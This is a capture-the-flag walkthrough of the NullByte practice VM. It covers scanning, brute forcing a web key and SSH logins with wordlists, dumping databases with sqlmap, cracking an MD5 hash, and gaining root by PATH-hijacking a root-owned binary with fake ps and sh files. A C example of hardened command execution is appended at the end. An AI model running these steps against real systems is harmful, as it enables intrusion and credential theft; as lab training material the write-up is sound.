Null-Byte Report
- Find the black box with arp-scan 172.16.0.0/16, add it to scope in Burp, run the Burp spider, and start scanning with nmap and nikto.
- nmap -p- -sV 172.16.0.13
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
111/tcp open rpcbind 2-4 (RPC #100000)
777/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
50927/tcp open status 1 (RPC #100024)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
- SSH is not on port 22; it is served on port 777 instead.
- nikto -h 172.16.0.13
Server: Apache/2.4.10 (Debian)
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ ETag header found on server, fields: 0xc4 0x51c42a5c32a70
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 6456 items checked: 0 error(s) and 4 item(s) reported on remote host
- Look for more information; strings can be hidden inside pictures. Download the picture and run:
strings main.gif
The first line of output is a string: kzMb5nVYJw
Try adding it to the URL: http://172.16.0.13/kzMb5nVYJw
Checking the source of this page:
<center>
<form method="post" action="index.php">
Key:<br>
<input type="password" name="key">
</form>
</center>
<!-- this form isn't connected to mysql, password ain't that complex --!>
- After following the hints, there is no other way to find the password, so brute force it:
Find the page in Burp and send it to Intruder (CTRL + I).
Add a payload such as the rockyou or crackstation password lists.
Run the attack.
Hydra or medusa can also be used to run this brute-force attack.
Success!! The password is elite:
Continue without entering a username and press Enter:
We have 2 users: isis and ramses
- Now we have two options: brute-force the users' SSH logins, or use sqlmap.
- Medusa:
medusa -u isis -P rockyou.txt -h 172.16.0.13 -M ssh -n 777
medusa -u ramses -P rockyou.txt -h 172.16.0.13 -M ssh -n 777
- Hydra:
- Sqlmap:
sqlmap -u http://172.16.0.13/kzMb5nVYJw/420search.php?usrtosearch= --dbs
Check mysql database:
sqlmap -u http://172.16.0.13/kzMb5nVYJw/420search.php?usrtosearch= --batch --dump -C User,Password -T user -D mysql
Check the application database, seth:
sqlmap -u http://172.16.0.13/kzMb5nVYJw/420search.php?usrtosearch=1 --dump --columns --tables -D seth
The code YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE= is base64; decode it with:
echo YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE= | base64 -d
The result is: c6d6bd7ebf806f43c76acc3681703b81
Crack this MD5 hash with john, hashcat or CrackStation; the password is:
omega
Logged in!
- ramses@NullByte:~$ ls -lha
drwxr-xr-x 2 ramses ramses 4.0K Aug 2 2015 .
drwxr-xr-x 5 root root 4.0K Aug 2 2015 ..
-rw------- 1 ramses ramses 96 Aug 2 2015 .bash_history
-rw-r--r-- 1 ramses ramses 220 Aug 2 2015 .bash_logout
-rw-r--r-- 1 ramses ramses 3.5K Aug 2 2015 .bashrc
-rw-r--r-- 1 ramses ramses 675 Aug 2 2015 .profile
Check the content of all the files; there is valuable information in .bash_history:
su eric
su eric
exit
ls
clear
cd /var/www
cd backup/
ls
./procwatch
clear
sudo -s
cd /
ls
exit
cd to /var/www/backup and check what procwatch is.
Procwatch is a security monitor written in Perl that watches the /proc filesystem for new processes. When a process is created, procwatch reports the time, the username, the PID, and the binary that was run. Its output is suitable for logging to log files and is geared for system administrators who are testing a new but as yet untrusted UNIX system.
Procwatch is owned by root, which means the file runs with root privileges.
Running procwatch, we can see that it runs sh and ps.
Create a new ps file:
echo /bin/sh > ps
chmod +x ps
Create a new sh file:
echo /bin/sh > sh
chmod +x sh
Set the PATH to:
export PATH=/var/www/backup:${PATH}
Run procwatch:
Yess! Root!!
At /root there is a proof file:
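The PATH hijack above only works because the root-owned procwatch starts ps and sh by bare name and inherits the caller's environment. As an added example that is not from the original report or from procwatch itself, here is the hardened pattern in C: absolute command paths only, a fixed environment handed to the child, and root privileges dropped before exec. SAFE_PATH, CLEAN_ENV and the helper functions are assumptions for illustration.

```c
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

#define SAFE_PATH "/usr/bin:/bin"       /* assumed trusted search path */

/* The only environment a helper ever sees: nothing inherited from the
 * caller (no PATH, IFS or LD_* under the caller's control). */
char *const CLEAN_ENV[] = { "PATH=" SAFE_PATH, NULL };

/* Accept only absolute, metacharacter-free command paths. procwatch in
 * the report fails this: it starts "ps" and "sh" by bare name. */
int is_safe_command(const char *cmd)
{
    if (cmd == NULL || cmd[0] != '/')
        return 0;                       /* relative name: PATH decides */
    if (strpbrk(cmd, " \t\n;&|`$<>()*?\\\"'") != NULL)
        return 0;                       /* would need a shell to parse */
    return 1;
}

/* Run cmd directly (no shell), as the real caller, in CLEAN_ENV.
 * Returns the child's exit status, or -1 on a policy or system failure. */
int run_hardened(const char *cmd, char *const argv[])
{
    int status;
    if (!is_safe_command(cmd))
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* give up the elevated identity before anything else executes */
        if (setgid(getgid()) != 0 || setuid(getuid()) != 0)
            _exit(127);
        execve(cmd, argv, CLEAN_ENV);
        _exit(127);                     /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    char *const argv[] = { "/bin/sh", "-c", "echo PATH=$PATH", NULL };
    return run_hardened("/bin/sh", argv);
}
```

With this pattern a writable directory placed first in the caller's PATH, as in the report, no longer influences which ps or sh the privileged program runs.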